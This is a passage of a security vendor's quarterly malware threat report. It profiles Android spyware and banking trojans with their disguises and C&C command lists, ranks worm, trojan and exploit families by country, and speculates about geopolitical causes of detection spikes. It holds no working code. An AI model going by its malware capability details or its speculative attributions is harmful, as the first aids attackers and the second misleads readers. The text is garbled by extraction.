Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
